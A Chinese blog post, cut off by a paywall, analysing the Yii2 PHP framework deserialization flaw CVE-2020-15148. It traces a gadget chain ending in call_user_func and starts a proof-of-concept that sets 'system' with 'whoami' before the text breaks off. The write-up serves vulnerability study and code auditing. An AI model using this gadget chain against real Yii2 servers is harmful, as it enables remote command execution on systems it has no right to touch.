[代码审计]yii2 反序列化漏洞分析

最新推荐文章于 2024-05-17 08:14:59 发布
最新推荐文章于 2024-05-17 08:14:59 发布
阅读量3.4k 收藏 6
点赞数 9
分类专栏: 代码审计 文章标签: 网络安全 php web安全 安全漏洞 yii
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51078229/article/details/121319481
版权
前言
摘要由CSDN通过智能技术生成

前言

漏洞存在版本<2.0.38
CVE-2020-15148

框架搭建

直接去github下载,修改好cookie的key,然后就可以访问/web了
在这里插入图片描述
在这里插入图片描述

漏洞分析

先看github里作者的提交

在这里插入图片描述
可以发现在 framework/db/BatchQueryResult.php 里面添加了_wakeup方法
我们就直奔这里去看了

yii2.0.37/vendor/yiisoft/yii2/db/BatchQueryResult.php

看到这里的__distruct()入口方法
在这里插入图片描述
会进去reset方法,但是进去可能就close了,但是这个_dataReader是可以控制的,到时候我们构造poc的时候可以添加析构方法为他赋值!这里$this->_dataReader就可以触发一个__call方法

全局搜一下__call方法,发现这个类里面有妙处

/vendor/fzaninotto/faker/src/Faker/Generator.php


    public function format($formatter, $arguments = array())
    {
   
        return call_user_func_array($this->getFormatter($formatter), $arguments);
    }
    
     /**
     * @param string $formatter
     *
     * @return Callable
     */
    public function getFormatter($formatter)
    {
   
        if (isset($this->formatters[$formatter])) {
   
            return $this->formtters[$formatter];
        }
        foreach ($this->providers as $provider) {
   
            if (method_exists($provider, $formatter)) {
   
                $this->formatters[$formatter] = array($provider, $formatter);

                return $this->formatters[$formatter];
            }
        }
        throw new \InvalidArgumentException(sprintf('Unknown formatter "%s"', $formatter));
    }
    
	/**
     * @param string $method
     * @param array $attributes
     *
     * @return mixed
     */
    public function __call($method, $attributes)
    {
   
        return $this->format($method, $attributes);
    }

可以发现,__call进去,就直接进format了,而format里面就会直接执行call_user_func_array,跟进一下他的参数

先跟进一下getFormatter,发现这里返回的是formatters,这个参数是我们可控的!
在这里插入图片描述
但是另一个$attributes就不可控了,这里是可以执行一些无参数的函数,但是如果只是调用php原生的那肯定做不了什么事情,我们需要调用yii框架里面自带的无参数方法看看有没有能进一步利用的

继续全局搜索,看看有没有那个无参数方法里面调用了call_user_func
这里是用的正则去搜索,这个正则折腾了好久

function \w*\(\)\n? *\{(.*\n)+ *call_user_func

大概意思就是 function 开头,接着是一段字符接上()后换行,并只匹配0或1次,这里就表示无参数的函数了,但是我们可以更狠一点,直接搜索无参数方法中有call_user_func的,那么就继续加上* \{ 匹配前面的表达式0次或多次后加上大括号,然后在call_user_func前面多次匹配上一堆除了换行之外的字符后加上换行(.*\n)+ *,最后加上call_user_func

这样就很精准的匹配到无参数方法中有call_user_func函数的方法了
这里找到了一个,简直不要太好打

/vendor/yiisoft/yii2/rest/CreateAction.php

public function run()
    {
   
        if ($this->checkAccess) {
   
            call_user_func($this->checkAccess, $this->id);
        }
        
		此处省略	
        
    }

checkAccess和id都是我们可控的!那么这条链子就打通了,我们构造一下poc

POC1

<?php
namespace yii\rest{
   
    class CreateAction{
   
        public $checkAccess;
        public $id;

        public function __construct(){
   
            $this->checkAccess = 'system';
            $this->id = 'whoami';
        }
最低0.47元/天 解锁文章
huamanggg
关注
  • 9
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Yii2框架 反序列化漏洞复现(CVE-2020-15148)
snowlyzz的博客
10-25 1749
yii2框架 反序列化漏洞复现
yii2反序列化漏洞总结
unexpectedthing的博客
03-29 4652
文章目录yii2框架 反序列化漏洞复现yii 框架搭建过程CVE-2020-15148复现链子2链子3链子4链子5链子6参考链接 yii2框架 反序列化漏洞复现 yii 框架 Yii 是一个适用于开发 Web2.0 应用程序的高性能PHP 框架。 Yii 是一个通用的 Web 编程框架,即可以用于开发各种用 PHP 构建的 Web 应用。 因为基于组件的框架结构和设计精巧的缓存支持,它特别适合开发大型应用, 如门户网站、社区、内容管理系统(CMS)、 电子商务项目和 RESTful Web 服务等。 Yii
通过几道CTF题学习yii2框架
最新发布
dzqxwzoe的博客
05-17 656
Yii是一套基于组件、用于开发大型 Web 应用的高性能 PHP 框架,之前的版本存在反序列化漏洞,程序在调用时,攻击者可通过构造特定的恶意请求执行任意命令,本篇就分析一下yii2利用链以及如何自己去构造payload,并结合CTF题目去学习yii2框架。
yii2反序列化代码审计cve漏洞复现
giaogiao123的博客
08-18 498
一环境 环境准备环境搭建 yii版本2.0.37和2.0.38 php版本 7.1 下载完打包,直接在 php yii serve 访问localhost:8080 二.分析漏洞 漏洞出发点 在\yii\vendor\yiisoft\yii2\db\BatchQueryResult.php文件中, 跟进reset 我们这里的_dataReader可控,然后$this->_dataREader->close(),触发__call方法(访问不存在的方法时触发)。 在\yii\vendor\f
yii2 反序列化漏洞复现与分析
meteox的博客
11-29 873
环境搭建 漏洞yii2.0.38之前的版本,下载2.0.37basic版本 https://github.com/yiisoft/yii2/releases/tag/2.0.37 修改/config/web文件的值 在当前目录输入php yii serve启动 复现 先构造反序列化的入口 新建一个controller <?php namespace app\controllers; class SerController extends \yii\web\Controller {
Yii2反序列化漏洞复现
SimoSimoSimo的博客
07-12 1278
Yii 是一个通用的 Web 编程框架,即可以用于开发各种用 PHP 构建的 Web 应用。 因为基于组件的框架结构和设计精巧的缓存支持,它特别适合开发大型应用, 如门户网站、社区、内容管理系统(CMS)、 电子商务项目和 RESTful Web 服务等。Yii2 2.0.38 以前的版本中存在反序列化漏洞,CVE编号是CVE-2020-15148到github上下载yii2的2.0.37版本打开 /config/web.php给17行的cookieValidationKey添加一个值,随便什么都行不添加就
Yii2语言国际化自动配置详解
10-18
主要介绍了Yii2语言国际化自动配置详解,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
yii2 反序列化写shell方式利用1
08-03
yii2 反序列化写 shell 式利 - 原创章发潜习安全遇到个 yii 的源码刚好有漏洞,搜了圈的 rce 都是调 call_user_func 直接sys
Yii2压缩PHP中模板代码的输出问题
10-18
Web开发中,无论是PHP的框架还是Python的框架,都会遇到使用模板的时候,在使用模板时会发现代码混乱不堪,怎么解决呢?下面小编给大家带来了Yii2压缩PHP中模板代码的输出问题,感兴趣的朋友一起看看吧
Yii2中cookie用法示例分析
10-21
主要介绍了Yii2中cookie用法,结合实例形式简单分析Yii2中cookie的设置、读取、配置等相关操作技巧,具有一定参考借鉴价值,需要的朋友可以参考下
Yii框架反序列化RCE利用链分析1
08-03
本文主要探讨了Yii2框架中的反序列化 Remote Code Execution (RCE)漏洞利用链的分析和构造过程。 首先,让我们理解反序列化漏洞的基本概念。在PHP中,`unserialize()`函数用于将序列化的字符串还原为PHP的对象或...
CVE-2020-15148--Yii2 反序列化漏洞复现
Monica的博客
09-26 1093
简介: YiiFramework是一个基于组件、用于开发大型Web应用的高性能 PHP 框架。Yii提供了今日Web 2.0应用开发所需要的几乎一切功能。Yii是最有效率的PHP框架之一。 Yii2 2.0.38 之前的版本存在反序列化漏洞,程序在调用unserialize 时,攻击者可通过构造特定的恶意请求执行任意命令。 环境部署: 下载地址: https://github.com/yiisoft/yii2/releases/tag/2.0.37 下载这个yii..
15-PHP代码审计——yii 2.0.37反序列化漏洞
网络安全
06-06 1196
Yii是一套基于组件、用于开发大型Web应用的高性能PHP框架。Yii2 2.0.38 之前的版本存在反序列化漏洞,如果程序内部调用了unserialize() 反序列化时,那么程序就可能存在反序列化漏洞,攻击者可通过构造特定的恶意请求执行任意命令。 影响版本: yii2 v2.0.37版本以下 环境: yii-basic-app-2.0.37.tgz php7.0以上 poc: http://www.yii2.com/web/index.php?r=test/sss&.
从某达OA到Yii2框架的cookie反序列化漏洞研究
HUANGXIN9898的博客
10-05 558
自身的一个tdAuthcode加解密函数来加密payload**,从而可以绕过一些防御检测。某达oa。
yii2框架开发之安全xss、csrf、sql注入、文件上传漏洞攻击
西瓜的博客
02-21 8052
常见的漏洞攻击:1、xss:是跨站脚本攻击    分3类:1、存储型2、反射型3、蠕虫型2、csrf:是跨站请求伪造攻击    分2类:1、get型2、post型3、sql注入4、文件上传xss攻击:xss攻击可以:盗取用户账号、也可以盗取后进行非法转账、还可以篡改系统信息、网站挂马等存储型xss下面我们来看下盗号代码(存储型xss):1、通过在浏览器f12 console中输入:2、docume...
Yii2 反序列化漏洞(CVE-2020-15148)复现
锋刃科技的博客
12-16 9336
漏洞概述 Yii是一套基于组件、用于开发大型Web应用的高性能PHP框架。Yii2 2.0.38 之前的版本存在反序列化漏洞,程序在调用unserialize 时,攻击者可通过构造特定的恶意请求执行任意命令。 环境搭建 到github上下载yii2的2.0.37版本 https://github.com/yiisoft/yii2/releases/tag/2.0.37 然后修改/config/web.php文件17行cookieValidationKey,可以随便定义 ...
yii漏洞-2.0.41链子复现
giaogiao123的博客
08-25 454
一环境配置 1.环境 yii-2.0.41版本 2. vscode+xdebug手动调试 3. php环境7.1 下载源码修改/config/web.php文件17行cookieValidationKey,随便设一个数目,然后,解压,到那个目录下php yii serve 启动(需要配置php环境变量) 访问 http//:localhost:8080 自己写一个反序列化入口 在controllers目录下创建一个TestController: <?php namespace app\contr
yii反序列化漏洞复现及利用
cosmoslin的博客
10-05 4488
yii反序列化漏洞 Yii框架 Yii 是一个适用于开发 Web2.0 应用程序的高性能PHP 框架。 Yii 是一个通用的 Web 编程框架,即可以用于开发各种用 PHP 构建的 Web 应用。 因为基于组件的框架结构和设计精巧的缓存支持,它特别适合开发大型应用, 如门户网站、社区、内容管理系统(CMS)、 电子商务项目和 RESTful Web 服务等。 Yii 当前有两个主要版本:1.1 和 2.0。 1.1 版是上代的老版本,现在处于维护状态。 2.0 版是一个完全重写的版本,采用了最新的技术和协议
"Yii框架反序列化RCE利用链分析及对比补丁详解
然而,最近发现了一个反序列化远程代码执行(RCE)利用链,这是一个严重的安全漏洞。接下来,我们将详细分析这个利用链,并介绍它的修复补丁。 首先,让我们来对比一下有漏洞版本和修复版本的代码。漏洞版本是指在....
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

huamanggg

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值